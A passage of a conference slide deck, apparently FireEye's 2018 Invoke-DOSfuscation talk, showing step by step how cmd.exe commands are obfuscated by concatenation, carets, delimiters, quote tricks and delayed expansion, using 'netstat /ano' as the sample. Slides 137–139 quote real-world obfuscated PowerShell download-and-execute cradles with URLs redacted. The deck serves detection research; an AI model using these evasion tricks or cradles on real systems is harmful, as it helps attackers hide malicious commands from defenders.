![Page 107: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/107.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
107
1. call %final%
2. cmd /c %final%
3. call echo %final% | cmd
4. call powershell "%final%"
5. call echo %final% | powershell -
1. (default when possible)
2. -FinalBinary cmd
3. -FinalBinary cmd -StdIn
4. -FinalBinary PowerShell
5. -FinalBinary PowerShell -StdIn
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
![Page 108: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/108.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
108
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
Payload Obfuscation 1 of 4: Concatenation
![Page 109: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/109.jpg)
• CMd /C "sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT
fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%"
109
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
•
•
•
•
Payload Obfuscation 1 of 4: Concatenation
![Page 110: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/110.jpg)
• CMd/C"sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT
fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%"
110
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
•
•
•
Payload Obfuscation 1 of 4: Concatenation
![Page 111: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/111.jpg)
• CMd /C " sEt coM3= /ano&& SEt cOm2=stat&& seT CoM1=net&& caLl
SeT fiNAl=%COm1%%cOm2%%coM3%&& cAlL %FinAl% "
111
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
•
•
•
Payload Obfuscation 1 of 4: Concatenation
![Page 112: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/112.jpg)
• ;,,CMd,; ,/C ", ;, ;sEt coM3= /ano&&,,,SEt cOm2=stat&&;;;seT CoM1=net&&,
;caLl,;,SeT fiNAl=%COm1%%cOm2%%coM3%&&; , ,cAlL, ;, ;%FinAl% "
112
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
•
•
Payload Obfuscation 1 of 4: Concatenation
![Page 113: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/113.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ;, ;s^Et ^ ^ co^M3=^^ /^^an^o&&,,,S^Et^ ^
^cO^m2=^s^^ta^^t&&;;;s^eT^ ^ C^oM1^=^n^^et&&, ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%&&; , ,c^AlL^, ;,^ ;%Fi^nAl^% "
113
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
•
Payload Obfuscation 1 of 4: Concatenation
![Page 114: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/114.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
114
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
Payload Obfuscation 1 of 4: Concatenation
![Page 115: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/115.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
115
CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^
^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^, ;,^
;%%Fi^nAl^%%) ) "
netstat /ano
Payload Obfuscation 1 of 4: Concatenation
![Page 116: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/116.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
116
CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T
^ ^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^,
;,^ ;%%Fi^nAl^%%) ) "
ne""tstat /ano
Payload Obfuscation 1 of 4: Concatenation
![Page 117: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/117.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
117
ne""tstat /ano
vs
n"e"tstat /ano
Payload Obfuscation 1 of 4: Concatenation
![Page 118: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/118.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
118
ne""tstat /ano
vs
n"e"tstat /ano
Payload Obfuscation 1 of 4: Concatenation
![Page 119: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/119.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
119
ne""tstat /ano
vs
n"e"tstat /ano
✘If we have to pair double
quotes, how can we unpair
in final variable?
Payload Obfuscation 1 of 4: Concatenation
![Page 120: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/120.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
120
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1.
2.
3.
4.
Payload Obfuscation 1 of 4: Concatenation
![Page 121: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/121.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
121
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2.
3.
4.
Payload Obfuscation 1 of 4: Concatenation
![Page 122: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/122.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^%) ) "
122
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3.
4.
Payload Obfuscation 1 of 4: Concatenation
![Page 123: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/123.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^ %) ) "
123
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4.
Payload Obfuscation 1 of 4: Concatenation
![Page 124: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/124.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""= %) ) "
124
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4.
Payload Obfuscation 1 of 4: Concatenation
![Page 125: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/125.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
125
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4.
Payload Obfuscation 1 of 4: Concatenation
![Page 126: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/126.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
126
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4.
✘ ✘
Payload Obfuscation 1 of 4: Concatenation
![Page 127: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/127.jpg)
https://i.imgur.com/PD9klNV.jpg
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
127
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
![Page 128: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/128.jpg)
https://i.imgur.com/PD9klNV.jpg
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
128
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
![Page 129: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/129.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
129
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
![Page 130: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/130.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
130
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
![Page 131: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/131.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
131
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. Variable expansion
• /V:ON
• /V:O
• /V:
• /V
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
![Page 132: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/132.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
132
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. Variable expansion
• /V:ON
• /V:O
• /V:
• /V
• /VISTA
• /VM
• /V*
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
![Page 133: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/133.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
133
• Env var names can be:
1.
2.
Payload Obfuscation 1 of 4: Concatenation
![Page 134: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/134.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ --$#$--=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^!!#**#!!=^s^^ta^^t)&&(;(;;s^eT^ ^ ……...=^n""^^e""t) ) &&set ;;;;;;;;;=""&&, ((
;c^aLl,^;,S^e^T ^ ^ '''''''''''''''=^%……...%%!!#**#!!%^%--$#$--%))&&; (, ,(c^AlL^, ;,^
;%''''''''''''''':""=!;;;;;;;;;:~0,1!%) ) "
134
• Env var names can be:
1. Special characters
2.
Payload Obfuscation 1 of 4: Concatenation
![Page 135: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/135.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ ' =^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^'
=^s^^ta^^t)&&(;(;;s^eT^ ^ ' =^n""^^e""t) ) &&set ' =""&&, (( ;c^aLl,^;,S^e^T ^ ^ '
=^%' %%' %^%' %))&&; (, ,(c^AlL^, ;,^ ;%' :""=!' :~0,1!%) ) "
135
• Env var names can be:
1. Special characters
2. Whitespace
Payload Obfuscation 1 of 4: Concatenation
![Page 136: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/136.jpg)
136
https://i.imgflip.com/rjkyg.jpg
Payload Obfuscation 1 of 4: Concatenation
![Page 137: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/137.jpg)
• Concatenation examples in the wild (1/3):
137
..\..\..\..\Windows\System32\cmd.exe /c "set da=wersh&& set gg=ell&& set
c0=po&&" cmd /c %c0%%da%%gg% -nonI -eP bypass -c iEx ((n`eW-OBjECt
('n'+'Et.w'+'EbclIe'+'nT')).('do'+'wNlo'+'adst'+'ring').Invoke(('h'+$s4+'t'+'t'+$o8
+'ps://'+…
Invoke-Obfuscation payload
Payload Obfuscation 1 of 4: Concatenation (ITW 1/3)
![Page 138: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/138.jpg)
• Concatenation examples in the wild (2/3):
138
CmD wMic & %Co^m^S^p^Ec^% /V /c set
%binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set
%zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set
%GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set
%jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiP
PcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. (
ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL)
Invoke-Obfuscation payload
Payload Obfuscation 1 of 4: Concatenation (ITW 2/3)
![Page 139: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/139.jpg)
• Concatenation examples in the wild (3/3):
139
cmd.exe /C "cm^d^.^e^x^e /V^ ^/C s^et g^c^=^er^s^&^&s^e^t
^tf=^he^ll^&^&set^ f^a^=^pow^&^&^s^et^
dq^=W^i^n^do^ws^!fa^!^!g^c^!!^t^f^!\^v^1^.0\^!^fa!^!^gc!!^tf^!^&^&^
ech^o^ iE^X^(^^"iex(neW-OBjecT
nEt.webCLiEnt).dowNlOaDstrING('https://REDACTED')^"^)^;^ ^|^
!dq! -^no^p^ ^-^w^i^n^ ^1^ ^-"
!dq! == WindowsPowerShell\v1.0\powershell
Payload Obfuscation 1 of 4: Concatenation (ITW 3/3)
![Page 140: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/140.jpg)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.140
https://f.fwallpapers.com/images/funny-bear.jpg
Last of ITW…
Unseen Techniques
Up Ahead!
![Page 141: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/141.jpg)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.141
https://f.fwallpapers.com/images/funny-bear.jpg
Last of ITW…
Unseen Techniques
Up Ahead!
